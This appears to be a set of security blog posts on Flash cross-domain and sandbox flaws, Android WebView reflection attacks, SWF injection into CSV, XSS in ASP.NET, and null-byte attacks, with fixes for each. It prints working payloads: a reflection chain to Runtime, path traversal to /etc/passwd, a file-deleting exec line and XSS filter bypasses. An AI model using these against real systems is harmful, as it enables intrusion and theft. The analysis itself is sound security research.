A cross-domain policy file grants a web client, such as a Flash or Silverlight application, the ability to make a cross-domain request and access the response. That is, it allows a Flash application on www.evil.com to make an HTTP request to www.bank.com and read the HTTP response, which may allow an attacker to acquire sensitive information (account information, sensitive messages, CSRF tokens, other junk, etc.), assuming the victim is logged into www.bank.com and the target domain defines an overly permissive cross-domain policy file such as the following. For Flash, the master cross-domain policy file lives in the root directory of the web server (www.bank.com/crossdomain.xml), but policy files may also exist under other directories, assuming the permitted-cross-domain-policies attribute is set accordingly (the default value is now master-only, which prevents the classic “upload text that looks like a cross-domain policy file to a web-based email client” attack). Read the specification for more info.
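For reference, a minimal overly permissive Flash policy file looks something like this (real policy files may include additional elements such as allow-http-request-headers-from):

```xml
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <!-- domain="*" lets SWFs served from ANY domain read responses from this host -->
    <allow-access-from domain="*" />
</cross-domain-policy>
```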

There are some legitimate use cases for defining a cross-domain policy file that allows requests from any domain. Etsy (the popular online marketplace for handmade goods) has created an open API that allows developers to create their own applications that hook into Etsy. There is both a normal JSON interface and a JSONP interface (for cross-domain requests via JavaScript). Etsy clearly wants to allow cross-domain access to its API, so its Flash cross-domain policy file (http://openapi.etsy.com/crossdomain.xml) used to look something like the following.

Basically, there is nothing worth stealing cross-domain here, but if we trigger an unhandled exception, the web server returns an HTML response, which is suspicious since all the other error messages are returned as plain text. And the response contains the CSRF nonce associated with www.etsy.com (not good).

So, given that openapi.etsy.com has an overly permissive cross-domain policy (not a problem in itself in this case), session identifier cookies are overly scoped, and openapi.etsy.com leaks CSRF tokens used on www.etsy.com, it was possible to bypass the CSRF mitigations implemented on www.etsy.com. The following is the basic workflow of the attack.

1) Victim is logged into www.etsy.com (sessions stay active for about 2 years).
2) Victim visits www.attack.com which includes a Flash application embedded in the page.
3) The Flash application attempts to make an HTTP request to openapi.etsy.com to trigger the error page that contains a CSRF token.
4) The Flash Player makes a pre-flight request for openapi.etsy.com/crossdomain.xml to determine whether or not the application should be allowed to make the request stated in the previous step.
5) Given that the policy file allows requests from any domain, the HTTP request goes through. Note that the browser sends along the proper cookies associated with etsy.com since the victim is logged in.
6) The Flash application parses the response for the CSRF token and passes the CSRF token to its parent webpage via JavaScript.
7) The parent webpage builds a CSRF payload with the correct CSRF token and auto-submits it to www.etsy.com to perform some random task. Note that I built an HTML-based CSRF exploit instead of a Flash-based CSRF exploit due to restrictions on how the navigateToURL function can be used.

The following is an example exploit written in ActionScript that can be compiled via mxmlc.

Etsy fixed the issue in two ways:

1) Remove the CSRF token from the error page (getting rid of the specific information leakage issue).

2) Change the cross-domain policy for Flash to only allow cross-domain requests from etsy.com subdomains.

Restricting only the Flash cross-domain policy was an interesting choice given the nature of the API, especially since they did not change the Silverlight cross-domain policy (clientaccesspolicy.xml), which still allows requests from any domain. In this specific case, the server responds with a 400 Bad Request status code, which means that a Silverlight application using the Browser HTTP handling mode would not be able to read the HTTP response regardless of the cross-domain policy (MSDN contains good information about Client vs. Browser mode for Silverlight applications). Flash imposes no such restriction on cross-domain requests, which highlights another subtle difference between how Flash and Silverlight handle cross-domain requests.

Android applications often use the WebView class to embed a browser component within an Activity in order to display online content. For example, the following code will show the Google homepage within an Activity.
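A minimal sketch of that kind of code (the Activity name is illustrative; standard Android SDK classes assumed):

```java
import android.app.Activity;
import android.os.Bundle;
import android.webkit.WebView;

public class BrowserActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);
        // Render online content directly inside the Activity
        webView.loadUrl("http://www.google.com");
    }
}
```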

An application can inject Java objects into a WebView via the addJavascriptInterface function. This allows JavaScript code to call the public methods of the injected Java object. Exposing Java objects to JavaScript can have negative security implications, such as allowing JavaScript to invoke native phone functionality (sending SMS messages to premium numbers, accessing account information, etc.) or allowing JavaScript to subvert existing browser security controls such as the same-origin policy. I could not find much information documenting how to exploit these issues, but an academic paper titled Attacks on WebView in the Android System explores a number of attacks and describes a situation in which a file-utilities object is exposed to JavaScript, allowing attackers to manipulate the file system if they can control any of the content rendered in a WebView via MitM, JavaScript injection, or redirection attacks.

The paper goes on to state that “in our case studies, 30% Android apps use addJavascriptInterface. How severe the problems of those apps are depends on the types of interfaces they provide and the permissions assigned to them.” The following code exposes the SmokeyBear class to JavaScript, but only declares one public function that returns a string. Is this interface safe to expose?
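A sketch of such an interface (the SmokeyBear class name comes from the post; the method body and the JavaScript-side object name are my assumptions):

```java
public class SmokeyBear {
    public String getSlogan() {
        return "Only you can prevent wildfires";
    }
}

// Inside the Activity, after creating the WebView:
webView.getSettings().setJavaScriptEnabled(true);
// JavaScript in any loaded page can now call window.smokeyBear.getSlogan()
webView.addJavascriptInterface(new SmokeyBear(), "smokeyBear");
```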

Probably not. Prior to Android 4.2, if an application uses addJavascriptInterface and allows an attacker to control the content rendered in a WebView, then, contrary to popular belief, the attacker can take control of the parent application regardless of the type of interface exposed. Consider the following code, which uses reflection to acquire a reference to a Runtime object via the SmokeyBear interface in order to write an ARM executable to the target application’s data directory and then execute it via Linux commands. The executable in this case sends all files stored on the SD card to a remote server (stealing photos, videos, and any other data improperly stored on the SD card). This type of payload works against both unrooted and rooted devices, since anything on the SD card is world readable and writable. If the attacker wants to break out of the Android application sandbox, he could use this same technique to drop a root exploit onto the device (gingerbreak, rageagainstthecage, zergRush, psneuter, etc.) and then execute it.
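The full exploit isn’t reproduced here, but the core reflection chain is easy to demonstrate on a plain JVM (no Android required). The sketch below assumes only that the injected object has one public method; the class and method names are illustrative:

```java
// Demonstrates the reflection chain behind the pre-4.2 addJavascriptInterface
// attack: any public method's receiver exposes getClass(), and from there
// Class.forName() reaches java.lang.Runtime even though SmokeyBear never
// references it.
public class ReflectionEscape {

    public static class SmokeyBear {
        public String getSlogan() {
            return "Only you can prevent wildfires";
        }
    }

    public static void main(String[] args) throws Exception {
        SmokeyBear bear = new SmokeyBear();

        // In the real attack, this chain is issued from JavaScript, e.g.:
        //   smokeyBear.getClass().forName("java.lang.Runtime")
        //             .getMethod("getRuntime", null).invoke(null, null)
        Object runtime = bear.getClass()
                .forName("java.lang.Runtime")
                .getMethod("getRuntime")
                .invoke(null);

        // An attacker would now invoke exec() on this object to run shell
        // commands; here we only prove that a Runtime reference was obtained.
        System.out.println(runtime.getClass().getName());
    }
}
```

Nothing about the exposed interface matters: the escape hatch is Object.getClass(), which every injected object inherits.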

Applications targeting API level 17 (Android 4.2) and above protect against the previous reflection-based attack by requiring programmers to annotate exposed functions (@JavascriptInterface), and I’m assuming the getClass function is missing this annotation. But currently only 0.8% of devices support API level 17, so we can’t realistically recommend using annotations to prevent this type of attack for a couple of years. So, how should we recommend our clients fix the issue?

Use addJavascriptInterface only if the application loads trusted content into the WebView component (Internet || IPC == sketch).

Develop a custom JavaScript bridge using the shouldOverrideUrlLoading function. An application could check the newly loaded URL for a custom URI scheme and respond accordingly, but be careful about what functionality you expose via this custom URI scheme, and use input validation and output encoding to prevent the standard injection attacks.
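A sketch of that pattern (the myapp:// scheme and the handleBridgeCall helper are hypothetical):

```java
webView.setWebViewClient(new WebViewClient() {
    @Override
    public boolean shouldOverrideUrlLoading(WebView view, String url) {
        if (url.startsWith("myapp://")) {
            // Page-side JavaScript triggers this with something like:
            //   window.location = "myapp://showToast?msg=hello";
            // Strictly validate the host, path, and parameters before acting.
            handleBridgeCall(Uri.parse(url));
            return true; // cancel the navigation; we handled it natively
        }
        return false; // let the WebView load ordinary URLs
    }
});
```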

Reconsider why a bridge between JavaScript and Java is a necessity for this Android application and remove the bridge if feasible.

Assuming an attacker can control the start of a CSV file served up by a web application, what damage could be done? The example PHP code below serves up a basic CSV file, but allows the user to control the column names. Note that the Content-Type header is at least set properly.
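A reconstruction of such an endpoint (the columnNames parameter comes from the post; the file name and row data are illustrative):

```php
<?php
// export.php (hypothetical) -- serves a CSV with user-supplied column names
header('Content-Type: text/csv');
header('Content-Disposition: attachment; filename="export.csv"');

// Column names are echoed verbatim: no input validation or output encoding
echo $_GET['columnNames'] . "\n";

// ...followed by rows the attacker does not control
echo "alice,42,2011-01-01\n";
?>
```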

Injecting HTML into the columnNames parameter seems like a promising approach, since the application accepts and uses the parameter without performing any input validation or output encoding. But the browser, even our old friend IE, will not render the content as HTML due to the Content-Type header’s value (text/csv). Note that this would be exploitable if the Content-Type header were set to text/plain instead, because IE will perform content sniffing in that situation.

Out of luck? Nope, just inject an entire SWF file into the columnNames parameter. A SWF’s origin is the domain from which it was retrieved, similar to a Java applet (which uses IP addresses instead of domain names, though), so a malicious page could embed a SWF that originates from the target’s domain and can make arbitrary requests to the target domain and read the responses (steal sensitive data, defeat CSRF protections, and other generally nasty actions). But what about the data in the CSV that we don’t control? The Flash Player will ignore any content following a well-formed SWF and execute the SWF properly. The following JavaScript code snippet demonstrates this technique. Since both browsers and HTTP servers impose limits on the length of URLs, I would recommend writing the payload in ActionScript 2 using a command-line compiler like MTASC or an assembler like Flasm in order to craft a small SWF. Sadly, Flex is bloated, so mxmlc is not an option.
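The embedding trick can be sketched as follows (the victim URL and endpoint name are illustrative, and the parameter value would be a complete URL-encoded SWF rather than the ellipsis shown):

```javascript
// The object element's type attribute -- not the URL's extension or the
// response's Content-Type -- tells the browser to hand the response to the
// Flash Player, which plays the injected SWF and ignores the trailing CSV rows.
document.write(
  '<object type="application/x-shockwave-flash" ' +
  'data="http://www.victim.com/export.php?columnNames=CWS...">' +
  '</object>'
);
```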

Ideally, web applications wouldn’t accept arbitrary content to build a CSV, but the Flash Player could also take steps to prevent this attack from occurring. The following improvements could be made, but will likely break some existing RIAs that fail to set the Content-Type header properly on their SWFs.

1) Refuse to play any SWF that does not have a correct MIME type (application/x-shockwave-flash).
2) Refuse to play any SWF that has erroneous data at the end of the file.

Moral of the story: setting the content type properly is not a substitute for proper input validation.

I suppose I should explain what Adobe refers to as a security control bypass (CVE-2011-2429). There are a number of different security sandboxes that the Flash Player uses to restrict SWFs. In this case, I was able to create a SWF that bypassed the restrictions imposed by the local-with-filesystem sandbox.

“The local-with-filesystem sandbox–For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.” [1]

Since a SWF placed into the local-with-filesystem sandbox can access local files, all we need to do is figure out a way to “communicate with the network in any way” in order to exfiltrate files from a victim’s computer. Billy Rios noticed that the getURL function was using protocol black-listing to prevent network communication with the outside world, so earlier this year he used the mhtml pseudo URL scheme, which works in IE, to bypass the security restrictions [2]. When I tried to reproduce his research, I received an annoying security exception from the Flash Player, so I searched for other pseudo URL schemes that might be useful, since I noticed that the Flash Player continued to simply black-list protocols as opposed to implementing some sort of white-list of acceptable protocols. I quickly came across the view-source pseudo URL scheme, which appeared to achieve similar results in Firefox and Chrome. The view-source scheme is used to *gasp* view the source of a resource, and you’ll notice that both browsers will make a new HTTP request to retrieve the resource if it has not been cached yet.

The proof of concept is fairly simple. There is technically a size restriction on the files that can be exfiltrated from the target’s machine due to browser restrictions on URL length, but it might be possible to bypass this restriction by using custom HTTP headers to transfer the file contents instead, or by using a different technique. The screenshot below shows the PoC SWF in action stealing some s3cr3t filez.

Searching for “how to prevent cross site scripting in .NET” in Google produces a number of interesting results. The first link points to an MSDN article titled How To: Prevent Cross-Site Scripting in ASP.NET. This article includes the following code snippet, which “uses HtmlEncode to ensure the inserted text is safe,” but upon further inspection the code is clearly vulnerable.

In this example, it is crucial to understand which characters the Server.HtmlEncode function actually encodes, and to understand the context in which the application injects the user input. The application accepts user input and uses it to build an inline style for a span element. In this context, a malicious user could inject JavaScript without the use of single or double quotes, as demonstrated by the following examples.
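For illustration, the vulnerable pattern and a quote-free payload could look something like the following (a reconstruction of the idea rather than the article’s exact snippet; expression() is an IE-only CSS feature):

```html
<!-- User input lands inside a style attribute; HtmlEncode only touches
     characters like < > & " -- none of which this payload needs. -->
<span style="color:<%= Server.HtmlEncode(Request.QueryString["color"]) %>">
  Sample text
</span>
```

A request such as ?color=expression(alert(document.cookie)) passes through Server.HtmlEncode untouched and executes script in older versions of IE.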

While the MSDN article remains popular, Microsoft has chosen not to maintain this documentation, which is a shame because most of the content is fairly informative for developers attempting to secure their code. Anyways, don’t believe everything you read and please use the Anti-XSS library instead of the Server.HtmlEncode function.

Attackers have commonly used the null character to bypass file extension restrictions during the exploitation of local file inclusion vulnerabilities. rain.forest.puppy outlined this type of attack against Perl-based CGI applications in Phrack issue 55 over ten years ago, but the problem has also affected web applications written in other higher-level languages such as Java, .NET, and PHP. Consider the following insecure PHP code.
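A reconstruction of the vulnerable pattern (the parameter name, script name, and .txt suffix are taken from the exploit request below; everything else is illustrative):

```php
<?php
// page.php -- includes a "template" chosen by the user
$filename = $_GET['filename'];

// The appended extension was meant to restrict inclusion to .txt files,
// but a trailing null byte used to truncate the path before the suffix.
include($filename . ".txt");
?>
```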

Clearly, an attacker could abuse the poorly written application to include arbitrary TXT files stored on the web server, which is certainly not good, but until fairly recently an attacker could also include any file regardless of the extension. Consider the following request an attacker could make to exploit the vulnerability and acquire the server’s password file.

http://www.victim.com/page.php?filename=../../etc/passwd%00

The developers of PHP addressed this issue in version 5.3.4 late last year, and “paths with NULL in them (foo\0bar.txt) are now considered as invalid.” Finally, the file_exists function behaves the way most programmers would expect. File systems, at least NTFS and most Unix file systems, do not allow the null character to appear within a file name, although many other control characters are permitted in file names.

So can we finally stop worrying about null bytes in PHP? Not really; the null byte can still cause issues in a number of other situations. Consider an application that performs rudimentary input validation to prevent command injection, but still allows the user to type in something like ../etc/passwd\0. Same problem, different function.

// Guess what file gets deleted?
exec("rm /tmp/../etc/passwd\0.tmp");

Attackers could also use null bytes to bypass black-list filters designed to mitigate the risk of cross-site scripting attacks by blocking specific HTML or JavaScript keywords. Applications should avoid relying on black-listing to prevent attacks, but Internet Explorer complicates the situation: IE essentially ignores null bytes in every context while rendering HTML and JavaScript, so we can easily craft a payload like the following to bypass black-list filters that attempt to sanitize input. Luckily, other browsers don’t play along with the null byte shenanigans, and the JavaScript fails to execute.
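A payload in the spirit of the original (null bytes shown URL-encoded as %00; the exact placement and the bogus attribute value are illustrative), combining null-byte keyword splitting with a throwaway <blah> element inside a bogus attribute:

```html
<scr%00ipt x="<blah>">al%00ert(document.cookie)</scr%00ipt>
```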

This example also illustrates one way of bypassing IE8’s XSS filter: the parameter value in the request will not exactly match the parameter value reflected in the response, which is accomplished by adding an erroneous <blah> element inside a bogus HTML attribute, since we know the application will attempt to sanitize the input rather than outright block the malicious request. Another way to ensure that the request signature will not match the response signature, and thereby bypass IE’s XSS filter, is to abuse applications that perform output encoding on some characters, such as double quotes, but fail to encode all relevant characters, such as single quotes. But I digress...

At the end of the day, null bytes will continue to cause security issues when software written in higher-level languages passes unvalidated user input to software written in C/C++ or assembly. Higher-level languages such as Java, PHP, Perl, and .NET assign no special meaning to the null character, while lower-level languages use it as the string terminator; this mismatch in string representation will often adversely affect security. Pascal-style strings are sounding like a good idea again 🙂